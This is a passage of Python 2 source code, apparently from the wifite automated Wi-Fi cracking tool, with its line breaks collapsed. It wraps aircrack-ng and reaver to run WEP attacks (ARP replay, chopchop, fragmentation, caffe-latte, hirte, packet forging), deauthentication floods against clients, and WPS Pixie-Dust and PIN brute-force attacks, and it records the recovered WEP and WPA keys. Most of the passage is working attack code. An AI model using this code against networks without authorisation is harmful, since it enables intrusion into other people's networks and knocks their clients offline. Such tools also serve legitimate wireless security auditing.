unexpectedly%s' % (R + current_hms, O, W) break # Break out of attack's While loop # Check for a .XOR file (we expect one when doing chopchop/fragmentation xor_file = '' for filename in sorted(os.listdir(self.RUN_CONFIG.temp)): if filename.lower().endswith('.xor'): xor_file = self.RUN_CONFIG.temp + filename if xor_file == '': print '\r %s attack failed: %sunable to generate keystream %s' % (R + current_hms, O, W) break remove_file(self.RUN_CONFIG.temp + 'arp.cap') cmd = ['packetforge-ng', '-0', '-a', self.target.bssid, '-h', client_mac, '-k', '', '-l', '', '-y', xor_file, '-w', self.RUN_CONFIG.temp + 'arp.cap', self.iface] proc_pforge = Popen(cmd, stdout=PIPE, stderr=DN) proc_pforge.wait() forged_packet = proc_pforge.communicate()[0] remove_file(xor_file) if forged_packet == None: result = '' forged_packet = forged_packet.strip() if not forged_packet.find('Wrote packet'): print "\r %s attack failed: unable to forget ARP packet %s" % ( R + current_hms + O, W) break # We were able to forge a packet, so let's replay it via aireplay-ng cmd = ['aireplay-ng', '--ignore-negative-one', '--arpreplay', '-b', self.target.bssid, '-r', self.RUN_CONFIG.temp + 'arp.cap', # Used the forged ARP packet '-F', # Select the first packet self.iface] proc_aireplay = Popen(cmd, stdout=DN, stderr=DN) print '\r %s forged %s! %s... ' % ( GR + current_hms + W, G + 'arp packet' + W, G + 'replaying' + W) replaying = True # After the attacks, if we are already cracking, wait for the key to be found! while started_cracking: # ivs > WEP_CRACK_AT_IVS: time.sleep(5) # Check number of IVs captured csv = self.RUN_CONFIG.RUN_ENGINE.parse_csv(self.RUN_CONFIG.temp + 'wep-01.csv')[0] if len(csv) > 0: ivs = int(csv[0].data) print GR + " [endless]" + W + " captured %s%d%s ivs, iv/sec: %s%d%s \r" % \ (G, total_ivs + ivs, W, G, (ivs - last_ivs) / 5, W), last_ivs = ivs stdout.flush() # Check if key has been cracked yet. if os.path.exists(self.RUN_CONFIG.temp + 'wepkey.txt'): # Cracked! infile = open(self.RUN_CONFIG.temp + 'wepkey.txt', 'r') key = infile.read().replace('\n', '') infile.close() print GR + '\n\n [endless] %s %s (%s)! key: "%s"' % ( G + 'cracked', self.target.ssid + W, G + self.target.bssid + W, C + key + W) self.RUN_CONFIG.WEP_FINDINGS.append( 'cracked %s (%s), key: "%s"' % (self.target.ssid, self.target.bssid, key)) self.RUN_CONFIG.WEP_FINDINGS.append('') t = Target(self.target.bssid, 0, 0, 0, 'WEP', self.target.ssid) t.key = key self.RUN_CONFIG.save_cracked(t) # Kill processes send_interrupt(proc_airodump) send_interrupt(proc_aireplay) send_interrupt(proc_aircrack) # Remove files generated by airodump/aireplay/packetforce remove_airodump_files(self.RUN_CONFIG.temp + 'wep') remove_file(self.RUN_CONFIG.temp + 'wepkey.txt') return True # Keyboard interrupt during attack except KeyboardInterrupt: print R + '\n (^C)' + O + ' WEP attack interrupted\n' + W send_interrupt(proc_airodump) if proc_aireplay != None: send_interrupt(proc_aireplay) if proc_aircrack != None: send_interrupt(proc_aircrack) options = [] selections = [] if remaining_attacks > 0: options.append('%scontinue%s attacking this target (%d remaining WEP attack%s)' % \ (G, W, (remaining_attacks), 's' if remaining_attacks != 1 else '')) selections.append(G + 'c' + W) if self.RUN_CONFIG.TARGETS_REMAINING > 0: options.append('%sskip%s this target, move onto next target (%d remaining target%s)' % \ (O, W, self.RUN_CONFIG.TARGETS_REMAINING, 's' if self.RUN_CONFIG.TARGETS_REMAINING != 1 else '')) selections.append(O + 's' + W) options.append('%sexit%s the program completely' % (R, W)) selections.append(R + 'e' + W) if len(options) > 1: # Ask user what they want to do, Store answer in "response" print GR + ' [+]' + W + ' what do you want to do?' response = '' while response != 'c' and response != 's' and response != 'e': for option in options: print ' %s' % option response = raw_input( GR + ' [+]' + W + ' please make a selection (%s): ' % (', '.join(selections))).lower()[0] else: response = 'e' if response == 'e' or response == 's': # Exit or skip target (either way, stop this attack) if self.RUN_CONFIG.WEP_SAVE: # Save packets save_as = re.sub(r'[^a-zA-Z0-9]', '', self.target.ssid) + '_' + self.target.bssid.replace(':', '-') + '.cap' + W try: rename(self.RUN_CONFIG.temp + 'wep-01.cap', save_as) except OSError: print R + ' [!]' + O + ' unable to save capture file!' + W else: print GR + ' [+]' + W + ' packet capture ' + G + 'saved' + W + ' to ' + G + save_as + W # Remove files generated by airodump/aireplay/packetforce for filename in os.listdir('.'): if filename.startswith('replay_arp-') and filename.endswith('.cap'): remove_file(filename) remove_airodump_files(self.RUN_CONFIG.temp + 'wep') remove_file(self.RUN_CONFIG.temp + 'wepkey.txt') print '' if response == 'e': self.RUN_CONFIG.exit_gracefully(0) return elif response == 'c': # Continue attacks # Need to backup temp/wep-01.cap and remove airodump files i = 2 while os.path.exists(self.RUN_CONFIG.temp + 'wep-' + str(i) + '.cap'): i += 1 copy(self.RUN_CONFIG.temp + "wep-01.cap", self.RUN_CONFIG.temp + 'wep-' + str(i) + '.cap') remove_airodump_files(self.RUN_CONFIG.temp + 'wep') # Need to restart airodump-ng, as it's been interrupted/killed proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN) # Say we haven't started cracking yet, so we re-start if needed. started_cracking = False # Reset IVs counters for proper behavior total_ivs += ivs ivs = 0 last_ivs = 0 # Also need to remember to crack "temp/*.cap" instead of just wep-01.cap pass if successful: print GR + '\n [0:00:00]' + W + ' attack complete: ' + G + 'success!' + W else: print GR + '\n [0:00:00]' + W + ' attack complete: ' + R + 'failure' + W send_interrupt(proc_airodump) if proc_aireplay != None: send_interrupt(proc_aireplay) # Remove files generated by airodump/aireplay/packetforce for filename in os.listdir('.'): if filename.startswith('replay_arp-') and filename.endswith('.cap'): remove_file(filename) remove_airodump_files(self.RUN_CONFIG.temp + 'wep') remove_file(self.RUN_CONFIG.temp + 'wepkey.txt') def wep_fake_auth(self, iface, target, time_to_display): """ Attempt to (falsely) authenticate with a WEP access point. Gives 3 seconds to make each 5 authentication attempts. Returns True if authentication was successful, False otherwise. """ max_wait = 3 # Time, in seconds, to allow each fake authentication max_attempts = 5 # Number of attempts to make for fa_index in xrange(1, max_attempts + 1): print '\r ', print '\r %s attempting %sfake authentication%s (%d/%d)... ' % \ (GR + time_to_display + W, G, W, fa_index, max_attempts), stdout.flush() cmd = ['aireplay-ng', '--ignore-negative-one', '-1', '0', # Fake auth, no delay '-a', target.bssid, '-T', '1'] # Make 1 attempt if target.ssid != '': cmd.append('-e') cmd.append(target.ssid) cmd.append(iface) proc_fakeauth = Popen(cmd, stdout=PIPE, stderr=DN) started = time.time() while proc_fakeauth.poll() == None and time.time() - started <= max_wait: pass if time.time() - started > max_wait: send_interrupt(proc_fakeauth) print R + 'failed' + W, stdout.flush() time.sleep(0.5) continue result = proc_fakeauth.communicate()[0].lower() if result.find('switching to shared key') != -1 or \ result.find('rejects open system'): pass if result.find('association successful') != -1: print G + 'success!' + W return True print R + 'failed' + W, stdout.flush() time.sleep(0.5) continue print '' return False def get_aireplay_command(self, iface, attack_num, target, clients, client_mac): """ Returns aireplay-ng command line arguments based on parameters. """ cmd = '' if attack_num == 0: cmd = ['aireplay-ng', '--ignore-negative-one', '--arpreplay', '-b', target.bssid, '-x', str(self.RUN_CONFIG.WEP_PPS)] # Packets per second if client_mac != '': cmd.append('-h') cmd.append(client_mac) elif len(clients) > 0: cmd.append('-h') cmd.append(clients[0].bssid) cmd.append(iface) elif attack_num == 1: cmd = ['aireplay-ng', '--ignore-negative-one', '--chopchop', '-b', target.bssid, '-x', str(self.RUN_CONFIG.WEP_PPS), # Packets per second '-m', '60', # Minimum packet length (bytes) '-n', '82', # Maxmimum packet length '-F'] # Automatically choose the first packet if client_mac != '': cmd.append('-h') cmd.append(client_mac) elif len(clients) > 0: cmd.append('-h') cmd.append(clients[0].bssid) cmd.append(iface) elif attack_num == 2: cmd = ['aireplay-ng', '--ignore-negative-one', '--fragment', '-b', target.bssid, '-x', str(self.RUN_CONFIG.WEP_PPS), # Packets per second '-m', '100', # Minimum packet length (bytes) '-F'] # Automatically choose the first packet if client_mac != '': cmd.append('-h') cmd.append(client_mac) elif len(clients) > 0: cmd.append('-h') cmd.append(clients[0].bssid) cmd.append(iface) elif attack_num == 3: cmd = ['aireplay-ng', '--ignore-negative-one', '--caffe-latte', '-b', target.bssid] if len(clients) > 0: cmd.append('-h') cmd.append(clients[0].bssid) cmd.append(iface) elif attack_num == 4: cmd = ['aireplay-ng', '--ignore-negative-one', '--interactive', '-b', target.bssid, '-c', 'ff:ff:ff:ff:ff:ff', '-t', '1', '-x', str(self.RUN_CONFIG.WEP_PPS), '-F', '-p', '0841', iface] elif attack_num == 5: if len(clients) == 0: print R + ' [0:00:00] unable to carry out hirte attack: ' + O + 'no clients' return '' cmd = ['aireplay-ng', '--ignore-negative-one', '--cfrag', '-h', clients[0].bssid, iface] return cmd def wep_send_deauths(self, iface, target, clients): """ Sends deauth packets to broadcast and every client. """ # Send deauth to broadcast cmd = ['aireplay-ng', '--ignore-negative-one', '--deauth', str(self.RUN_CONFIG.WPA_DEAUTH_COUNT), '-a', target.bssid, iface] call(cmd, stdout=DN, stderr=DN) # Send deauth to every client for client in clients: cmd = ['aireplay-ng', '--ignore-negative-one', '--deauth', str(self.RUN_CONFIG.WPA_DEAUTH_COUNT), '-a', target.bssid, '-h', client.bssid, iface] call(cmd, stdout=DN, stderr=DN) ################# # WPS FUNCTIONS # ################# class WPSAttack(Attack): def __init__(self, iface, target, config): self.iface = iface self.target = target self.RUN_CONFIG = config def RunAttack(self): ''' Abstract method for initializing the WPS attack ''' if self.is_pixie_supported(): # Try the pixie-dust attack if self.attack_wps_pixie(): # If it succeeds, stop return True # Drop out if user specified to run ONLY the pixie attack if self.RUN_CONFIG.PIXIE: return False # Try the WPS PIN attack return self.attack_wps() def EndAttack(self): ''' Abstract method for ending the WPS attack ''' pass def is_pixie_supported(self): ''' Checks if current version of Reaver supports the pixie-dust attack ''' p = Popen(['reaver', '-h'], stdout=DN, stderr=PIPE) stdout = p.communicate()[1] for line in stdout.split('\n'): if '--pixie-dust' in line: return True return False def attack_wps_pixie(self): """ Attempts "Pixie WPS" attack which certain vendors susceptible to. """ # TODO Check if the user's version of reaver supports the Pixie attack (1.5.2+, "mod by t6_x") # If not, return False print GR + ' [0:00:00]' + W + ' initializing %sWPS Pixie attack%s on %s' % \ (G, W, G + self.target.ssid + W + ' (' + G + self.target.bssid + W + ')' + W) cmd = ['reaver', '-i', self.iface, '-b', self.target.bssid, '-o', self.RUN_CONFIG.temp + 'out.out', # Dump output to file to be monitored '-c', self.target.channel, '-s', 'n', '-K', '1', # Pixie WPS attack '-vv'] # verbose output # Redirect stderr to output file errf = open(self.RUN_CONFIG.temp + 'pixie.out', 'a') # Start process proc = Popen(cmd, stdout=errf, stderr=errf) cracked = False # Flag for when password/pin is found time_started = time.time() pin = '' key = '' try: while not cracked: time.sleep(1) errf.flush() if proc.poll() != None: # Process stopped: Cracked? Failed? errf.close() inf = open(self.RUN_CONFIG.temp + 'pixie.out', 'r') lines = inf.read().split('\n') inf.close() for line in lines: # When it's cracked: if line.find("WPS PIN: '") != -1: pin = line[line.find("WPS PIN: '") + 10:-1] if line.find("WPA PSK: '") != -1: key = line[line.find("WPA PSK: '") + 10:-1] cracked = True # When it' failed: if 'Pixie-Dust' in line and 'WPS pin not found' in line: # PixieDust isn't possible on this router print '\r %s WPS Pixie attack%s failed - WPS pin not found %s' % (GR + sec_to_hms(time.time() - time_started) + G, R, W) break break print '\r %s WPS Pixie attack:' % (GR + sec_to_hms(time.time() - time_started) + G), # Check if there's an output file to parse if not os.path.exists(self.RUN_CONFIG.temp + 'out.out'): continue inf = open(self.RUN_CONFIG.temp + 'out.out', 'r') lines = inf.read().split('\n') inf.close() output_line = '' for line in lines: line = line.replace('[+]', '').replace('[!]', '').replace('\0', '').strip() if line == '' or line == ' ' or line == '\t': continue if len(line) > 50: # Trim to a reasonable size line = line[0:47] + '...' output_line = line if 'Sending M2 message' in output_line: # At this point in the Pixie attack, all output is via stderr # We have to wait for the process to finish to see the result. print O, 'attempting to crack and fetch psk... ', W, elif output_line != '': # Print the last message from reaver as a "status update" print C, output_line, W, ' ' * (50 - len(output_line)), stdout.flush() # Clear out output file inf = open(self.RUN_CONFIG.temp + 'out.out', 'w') inf.close() # End of big "while not cracked" loop if cracked: if pin != '': print GR + '\n\n [+]' + G + ' PIN found: %s' % (C + pin + W) if key != '': print GR + ' [+] %sWPA key found:%s %s' % (G, W, C + key + W) self.RUN_CONFIG.WPA_FINDINGS.append(W + "found %s's WPA key: \"%s\", WPS PIN: %s" % ( G + self.target.ssid + W, C + key + W, C + pin + W)) self.RUN_CONFIG.WPA_FINDINGS.append('') t = Target(self.target.bssid, 0, 0, 0, 'WPA', self.target.ssid) t.key = key t.wps = pin self.RUN_CONFIG.save_cracked(t) except KeyboardInterrupt: print R + '\n (^C)' + O + ' WPS Pixie attack interrupted' + W if attack_interrupted_prompt(): send_interrupt(proc) print '' self.RUN_CONFIG.exit_gracefully(0) send_interrupt(proc) # Delete the files os.remove(self.RUN_CONFIG.temp + "out.out") os.remove(self.RUN_CONFIG.temp + "pixie.out") return cracked def attack_wps(self): """ Mounts attack against target on iface. Uses "reaver" to attempt to brute force the PIN. Once PIN is found, PSK can be recovered. PSK is displayed to user and added to WPS_FINDINGS """ print GR + ' [0:00:00]' + W + ' initializing %sWPS PIN attack%s on %s' % \ (G, W, G + self.target.ssid + W + ' (' + G + self.target.bssid + W + ')' + W) cmd = ['reaver', '-i', self.iface, '-b', self.target.bssid, '-o', self.RUN_CONFIG.temp + 'out.out', # Dump output to file to be monitored '-a', # auto-detect best options, auto-resumes sessions, doesn't require input! '-c', self.target.channel, # '--ignore-locks', '-vv'] # verbose output proc = Popen(cmd, stdout=DN, stderr=DN) cracked = False # Flag for when password/pin is found percent = 'x.xx%' # Percentage complete aps = 'x' # Seconds per attempt time_started = time.time() last_success = time_started # Time of last successful attempt last_pin = '' # Keep track of last pin tried (to detect retries) retries = 0 # Number of times we have attempted this PIN tries_total = 0 # Number of times we have attempted all pins tries = 0 # Number of successful attempts pin = '' key = '' try: while not cracked: time.sleep(1) if proc.poll() != None: # Process stopped: Cracked? Failed? inf = open(self.RUN_CONFIG.temp + 'out.out', 'r') lines = inf.read().split('\n') inf.close() for line in lines: # When it's cracked: if line.find("WPS PIN: '") != -1: pin = line[line.find("WPS PIN: '") + 10:-1] if line.find("WPA PSK: '") != -1: key = line[line.find("WPA PSK: '") + 10:-1] cracked = True break if not os.path.exists(self.RUN_CONFIG.temp + 'out.out'): continue inf = open(self.RUN_CONFIG.temp + 'out.out', 'r') lines = inf.read().split('\n') inf.close() for line in lines: if line.strip() == '': continue # Status if line.find(' complete @ ') != -1 and len(line) > 8: percent = line.split(' ')[1] i = line.find(' (') j = line.find(' seconds/', i) if i != -1 and j != -1: aps = line[i + 2:j] # PIN attempt elif line.find(' Trying pin ') != -1: pin = line.strip().split(' ')[-1] if pin == last_pin: retries += 1 elif tries_total == 0: last_pin = pin tries_total -= 1 else: last_success = time.time() tries += 1 last_pin = pin retries = 0 tries_total += 1 # Warning elif line.endswith('10 failed connections in a row'): pass # Check for PIN/PSK elif line.find("WPS PIN: '") != -1: pin = line[line.find("WPS PIN: '") + 10:-1] elif line.find("WPA PSK: '") != -1: key = line[line.find("WPA PSK: '") + 10:-1] cracked = True if cracked: break print ' %s WPS attack, %s success/ttl,' % \ (GR + sec_to_hms(time.time() - time_started) + W, \ G + str(tries) + W + '/' + O + str(tries_total) + W), if percent == 'x.xx%' and aps == 'x': print '\r', else: print '%s complete (%s sec/att) \r' % (G + percent + W, G + aps + W), if self.RUN_CONFIG.WPS_TIMEOUT > 0 and (time.time() - last_success) > self.RUN_CONFIG.WPS_TIMEOUT: print R + '\n [!]' + O + ' unable to complete successful try in %d seconds' % ( self.RUN_CONFIG.WPS_TIMEOUT) print R + ' [+]' + W + ' skipping %s' % (O + self.target.ssid + W) break if self.RUN_CONFIG.WPS_MAX_RETRIES > 0 and retries > self.RUN_CONFIG.WPS_MAX_RETRIES: print R + '\n [!]' + O + ' unable to complete successful try in %d retries' % ( self.RUN_CONFIG.WPS_MAX_RETRIES) print R + ' [+]' + O + ' the access point may have WPS-locking enabled, or is too far away' + W print R + ' [+]' + W + ' skipping %s' % (O + self.target.ssid + W) break if self.RUN_CONFIG.WPS_RATIO_THRESHOLD > 0.0 and tries > 0 and ( float(tries) / tries_total) < self.RUN_CONFIG.WPS_RATIO_THRESHOLD: print R + '\n [!]' + O + ' successful/total attempts ratio was too low (< %.2f)' % ( self.RUN_CONFIG.WPS_RATIO_THRESHOLD) print R + ' [+]' + W + ' skipping %s' % (G + self.target.ssid + W) break stdout.flush() # Clear out output file if bigger than 1mb inf = open(self.RUN_CONFIG.temp + 'out.out', 'w') inf.close() # End of big "while not cracked" loop if cracked: if pin != '': print GR + '\n\n [+]' + G + ' PIN found: %s' % (C + pin + W) if key != '': print GR + ' [+] %sWPA key found:%s %s' % (G, W, C + key + W) self.RUN_CONFIG.WPA_FINDINGS.append(W + "found %s's WPA key: \"%s\", WPS PIN: %s" % ( G + self.target.ssid + W, C + key + W, C + pin + W)) self.RUN_CONFIG.WPA_FINDINGS.append('') t = Target(self.target.bssid, 0, 0, 0, 'WPA', self.target.ssid) t.key = key t.wps = pin self.RUN_CONFIG.save_cracked(t) except KeyboardInterrupt: print R + '\n (^C)' + O + ' WPS brute-force attack interrupted' + W if attack_interrupted_prompt(): send_interrupt(proc) print '' self.RUN_CONFIG.exit_gracefully(0) send_interrupt(proc) return cracked if __name__ == '__main__': RUN_CONFIG = RunConfiguration() try: banner(RUN_CONFIG) engine = RunEngine(RUN_CONFIG) engine.Start() #main(RUN_CONFIG) except KeyboardInterrupt: print R + '\n (^C)' + O + ' interrupted\n' + W except EOFError: print R + '\n (^D)' + O + ' interrupted\n' + W RUN_CONFIG.exit_gracefully(0)